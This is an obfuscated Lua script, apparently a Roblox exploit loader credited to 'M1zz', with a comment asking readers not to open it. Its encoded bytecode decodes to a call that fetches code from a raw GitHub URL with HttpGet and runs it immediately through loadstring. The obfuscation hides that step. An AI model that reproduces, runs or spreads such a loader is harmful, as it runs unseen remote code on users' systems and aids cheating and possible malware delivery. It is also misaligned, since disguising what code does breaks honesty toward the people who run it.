--[[
  _______      / |     _______
 |       \    /  |     |      \
 |        |  /   |     |       |
 |_______/  /____|___  |       |
 |   \           |     |       |
 |    \          |     |       |
 |     \         |     |______/
 
 By M1zz
]]--

--You Don't Have To Open This SKID!!!
--Do Not Skid!
local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=v2(v0(v30,16));if v19 then local v86=v5(v79,v19);v19=nil;return v86;else return v79;end end end);local function v20(v31,v32,v33) if v33 then local v80=0 -(0 + 0) ;local v81;while true do if (v80==(0 -0)) then v81=(v31/(2^(v32-(1 -0))))%(((5 -1) -2)^(((v33-((1685 -(68 + 997)) -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -((1637 -(226 + 1044)) + 201)))) ;return v81-(v81%(4 -3)) ;end end else local v82=((2566 -(1523 + 114)) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v82 + v82))>=v82) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 ;return (v36 * (251 + 5)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + 1 + 3 ;return (v40 * (16778173 -(892 + 65))) + (v39 * (156337 -90801)) + (v38 * 256) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=(3 -2) -0 ;local v44=(v20(v42,1 -0 ,4 + 16 ) * ((3 -1)^(32 + 0))) + v41 ;local v45=v20(v42,812 -((1306 -938) + 423) ,(1240 -(814 + 45)) -(87 + 263) );local v46=((v20(v42,50 -(10 + 8) )==((445 -264) -(67 + 113))) and  -(1 + 0)) or (3 -2) ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * (0 -(0 + 0)) ;else local v87=952 -(802 + 150) ;while true do if (v87==(430 -(44 + 386))) then v45=2 -(1 + 0) ;v43=0 -0 ;break;end end end elseif (v45==(1490 + (1442 -(261 + 624)))) then return ((v44==(997 -(915 + 82))) and (v46 * ((2 -1)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((2 -0)^(1239 -((1899 -830) + 118))))) ;end local function v25(v47) local v48=1080 -(1020 + 60) ;local v49;local v50;while true do if (((2189 -(745 + 21)) -(630 + 793))==v48) then v49=nil;if  not v47 then v47=v23();if (v47==(1913 -(1789 + 124))) then return "";end end v48=3 -2 ;end if (2==v48) then v50={};for v88=1, #v49 do v50[v88]=v2(v1(v3(v49,v88,v88)));end v48=14 -11 ;end if (v48==(2 + 1)) then return v6(v50);end if (v48==1) then v49=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;v48=1749 -(760 + 987) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 1900 -(106 + 1794) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do local v64=(function() return 0 -0 ;end)();while true do if (v64==(1 + 0)) then if (v51~=(2 + 0)) then else for v97= #"|",v23() do local v98=(function() return 0 + 0 ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v98==(1 + 0)) then while true do if (v99~=(0 -0)) then else v100=(function() return v21();end)();if (v20(v100, #" ", #"!")==(0 -0)) then local v158=(function() return 0;end)();local v159=(function() return;end)();local v160=(function() return;end)();local v161=(function() return;end)();local v162=(function() return;end)();while true do if ((1275 -(388 + 886))~=v158) then else local v163=(function() return 0;end)();while true do if (v163~=(114 -(4 + 110))) then else v161=(function() return nil;end)();v162=(function() return nil;end)();v163=(function() return 1 -0 ;end)();end if (v163==(585 -(57 + 527))) then v158=(function() return 1 + 1 ;end)();break;end end end if (v158==(562 -(306 + 254))) then while true do if (v159~= #":") then else local v168=(function() return 0;end)();local v169=(function() return;end)();while true do if ((0 + 0)~=v168) then else v169=(function() return 0 -0 ;end)();while true do if (v169~=0) then else v162=(function() return {v22(),v22(),nil,nil};end)();if (v160==(166 -(122 + 44))) then local v176=(function() return 0 -0 ;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 1467 -(899 + 568) ;end)();while true do if (v177~=0) then else v162[ #"91("]=(function() return v22();end)();v162[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v160== #"{") then v162[ #"xxx"]=(function() return v23();end)();elseif (v160==(2 + 0)) then v162[ #"nil"]=(function() return v23() -((2 + 0)^(38 -22)) ;end)();elseif (v160~= #"-19") then else local v184=(function() return 603 -(268 + 335) ;end)();local v185=(function() return;end)();while true do if (v184==(290 -(60 + 230))) then v185=(function() return 0;end)();while true do if (v185~=0) then else v162[ #"xnx"]=(function() return v23() -((574 -(426 + 146))^(32 -16)) ;end)();v162[ #".dev"]=(function() return v22();end)();break;end end break;end end end v169=(function() return 1 + 0 ;end)();end if (v169~=(1457 -(282 + 1174))) then else v159=(function() return 813 -(569 + 242) ;end)();break;end end break;end end end if (v159==(1257 -(1043 + 214))) then local v170=(function() return 0;end)();local v171=(function() return;end)();while true do if (v170~=(0 -0)) then else v171=(function() return 0 -0 ;end)();while true do if (v171==1) then v159=(function() return  #"[";end)();break;end if (v171==(0 + 0)) then v160=(function() return v20(v100,1026 -(706 + 318) , #"xxx");end)();v161=(function() return v20(v100, #"http",1257 -(721 + 530) );end)();v171=(function() return 2 -1 ;end)();end end break;end end end if (v159~=(1273 -(945 + 326))) then else local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172==(0 -0)) then v173=(function() return 0 + 0 ;end)();while true do if ((0 + 0)~=v173) then else if (v20(v161, #"~", #"]")~= #"~") then else v162[702 -(271 + 429) ]=(function() return v57[v162[2 + 0 ]];end)();end if (v20(v161,984 -(18 + 964) ,7 -5 )~= #"~") then else v162[ #"19("]=(function() return v57[v162[ #"nil"]];end)();end v173=(function() return 1501 -(1408 + 92) ;end)();end if (v173~=(1 + 0)) then else v159=(function() return  #"-19";end)();break;end end break;end end end if (v159== #"-19") then if (v20(v161, #"gha", #"asd")== #">") then v162[ #"asd1"]=(function() return v57[v162[ #"asd1"]];end)();end v52[v97]=(function() return v162;end)();break;end end break;end if (v158==(0 + 0)) then local v164=(function() return 0;end)();while true do if (0==v164) then v159=(function() return 0;end)();v160=(function() return nil;end)();v164=(function() return 1;end)();end if (v164~=(851 -(20 + 830))) then else v158=(function() return 1;end)();break;end end end end end break;end end break;end if (v98==(0 + 0)) then local v105=(function() return 126 -(116 + 10) ;end)();local v106=(function() return;end)();while true do if (v105~=(1086 -(461 + 625))) then else v106=(function() return 0 + 0 ;end)();while true do if (v106==(738 -(542 + 196))) then v99=(function() return 0;end)();v100=(function() return nil;end)();v106=(function() return 1289 -(993 + 295) ;end)();end if (v106~=(1 + 0)) then else v98=(function() return 1172 -(418 + 753) ;end)();break;end end break;end end end end end for v101= #"{",v23() do v53[v101-#"/" ]=(function() return v28();end)();end return v55;end break;end if (v64~=(0 + 0)) then else if (v51~= #",") then else local v94=(function() return 0 -0 ;end)();local v95=(function() return;end)();while true do if (v94~=(0 + 0)) then else v95=(function() return 0 + 0 ;end)();while true do if (v95==0) then v56=(function() return v23();end)();v57=(function() return {};end)();v95=(function() return 1552 -(1126 + 425) ;end)();end if (v95==(406 -(118 + 287))) then for v135= #"\\",v56 do local v136=(function() return 0 + 0 ;end)();local v137=(function() return;end)();local v138=(function() return;end)();local v139=(function() return;end)();while true do if (v136~=1) then else v139=(function() return nil;end)();while true do if (v137~= #"|") then else if (v138== #"]") then v139=(function() return v21()~=(0 + 0) ;end)();elseif (v138==(7 -5)) then v139=(function() return v24();end)();elseif (v138~= #"xnx") then else v139=(function() return v25();end)();end v57[v135]=(function() return v139;end)();break;end if (v137~=(1121 -(118 + 1003))) then else local v166=(function() return 529 -(406 + 123) ;end)();local v167=(function() return;end)();while true do if (v166==0) then v167=(function() return 0;end)();while true do if (v167==(0 -0)) then v138=(function() return v21();end)();v139=(function() return nil;end)();v167=(function() return 1770 -(1749 + 20) ;end)();end if (v167~=1) then else v137=(function() return  #" ";end)();break;end end break;end end end end break;end if (v136~=(377 -(142 + 235))) then else v137=(function() return 0 -0 ;end)();v138=(function() return nil;end)();v136=(function() return 1 + 0 ;end)();end end end v55[ #"91("]=(function() return v21();end)();v95=(function() return 1 + 1 ;end)();end if (v95==2) then v51=(function() return 1324 -(1249 + 73) ;end)();break;end end break;end end end if (v51~=(977 -(553 + 424))) then else local v96=(function() return 0 + 0 ;end)();while true do if ((1146 -(466 + 679))~=v96) then else v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v96=(function() return 2 + 0 ;end)();end if (v96==0) then v52=(function() return {};end)();v53=(function() return {};end)();v96=(function() return 1;end)();end if (2~=v96) then else v51=(function() return  #"<";end)();break;end end end v64=(function() return 2 -1 ;end)();end end end end local function v29(v58,v59,v60) local v61=v58[1];local v62=v58[1 + 1 ];local v63=v58[3];return function(...) local v65=v61;local v66=v62;local v67=v63;local v68=v27;local v69=1 + 0 + 0 ;local v70= -((6 -4) -1);local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v83=0,v73 do if (v83>=v67) then v71[v83-v67 ]=v72[v83 + (2 -1) ];else v75[v83]=v72[v83 + 1 + (0 -0) ];end end local v76=(v73-v67) + (4 -3) ;local v77;local v78;while true do v77=v65[v69];v78=v77[754 -(239 + 514) ];if (v78<=(3 + 3)) then if (v78<=(1331 -((1815 -(697 + 321)) + 532))) then if ((v78<=(0 + (0 -0))) or (4012<=3358)) then v75[v77[1 + 1 ]]();elseif (v78>1) then local v107=0 -0 ;local v108;local v109;while true do if ((1494<=3005) and (v107==(1202 -(373 + 829)))) then v108=v77[733 -(476 + (539 -284)) ];v109=v75[v77[1133 -(369 + 761) ]];v107=1 + 0 ;end if (v107==(2 -1)) then v75[v108 + (1 -0) ]=v109;v75[v108]=v109[v77[7 -3 ]];break;end end else local v110=v77[240 -(64 + 174) ];v75[v110]=v75[v110](v13(v75,v110 + 1 ,v70));end elseif (v78<=4) then if (v78>3) then v75[v77[1 + 1 ]]=v60[v77[3 -0 ]];else local v114=336 -(144 + 192) ;local v115;local v116;while true do if ((((85 + 132) -(42 + 174))==v114) or (3111==2134)) then v75[v115 + 1 + 0 ]=v116;v75[v115]=v116[v77[4]];break;end if ((2355==2355) and (v114==(0 + 0))) then v115=v77[1 + 1 ];v116=v75[v77[1507 -(363 + 1141) ]];v114=1581 -(1183 + 397) ;end end end elseif (v78==5) then v75[v77[5 -3 ]]=v60[v77[5 -2 ]];else local v119=0 + 0 ;local v120;local v121;local v122;local v123;while true do if ((1 + (0 -0))==v119) then v70=(v122 + v120) -(1976 -(1913 + (1289 -(322 + 905)))) ;v123=0;v119=2 + 0 ;end if ((v119==(5 -3)) or (588<=432)) then for v153=v120,v70 do v123=v123 + ((2545 -(602 + 9)) -(565 + 1368)) ;v75[v153]=v121[v123];end break;end if (v119==(0 -0)) then v120=v77[1663 -(1477 + 184) ];v121,v122=v68(v75[v120](v13(v75,v120 + 1 ,v77[3 -0 ])));v119=1 + (1189 -(449 + 740)) ;end end end elseif ((4797>=3895) and (v78<=(865 -(564 + 292)))) then if ((3577==3577) and (v78<=(11 -4))) then v75[v77[5 -3 ]]=v77[307 -(244 + 60) ];elseif (v78==(7 + 1)) then local v124=476 -(41 + (1307 -(826 + 46))) ;local v125;while true do if ((3794>3693) and (v124==(1001 -(938 + 63)))) then v125=v77[2];v75[v125]=v75[v125](v13(v75,v125 + 1 ,v70));break;end end else v75[v77[2]]=v77[(950 -(245 + 702)) + 0 ];end elseif (v78<=(1136 -(936 + 189))) then if ((v78>((12 -8) + 6)) or (1275==4100)) then v75[v77[2]]();else do return;end end elseif ((v78==(1625 -(1565 + 48))) or (1591>=3580)) then do return;end else local v128=v77[2 + 0 ];local v129,v130=v68(v75[v128](v13(v75,v128 + (1139 -(252 + 530 + (2254 -(260 + 1638)))) ,v77[270 -(176 + 91) ])));v70=(v130 + v128) -(2 -1) ;local v131=440 -(382 + 58) ;for v132=v128,v70 do local v133=0 -0 ;while true do if ((0 -0)==v133) then v131=v131 + (1093 -(975 + 117)) ;v75[v132]=v129[v131];break;end end end end v69=v69 + (1876 -(131 + 26 + 1718)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403E33O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F557365723339343834383338393239333934383338393239322F332D5F2D5F2D3938343834382D5F2D312O3833323932303239333933392D5F2D5F2D5F2D2F6D61696E2F2532332825324225323425324225323438313932383437215F21252O32215F38333932383337333732372533422532345F2533422125323428253233253242252O322D252O32282534302952344429253234285F425939323932294D312O5A2O303129253234285F2532332825323328322O393239322532423239323900083O0012053O00013O001205000100023O002002000100010003001207000300044O000D000100034O00015O00022O000B3O000100012O000A3O00017O00",v9(),...);
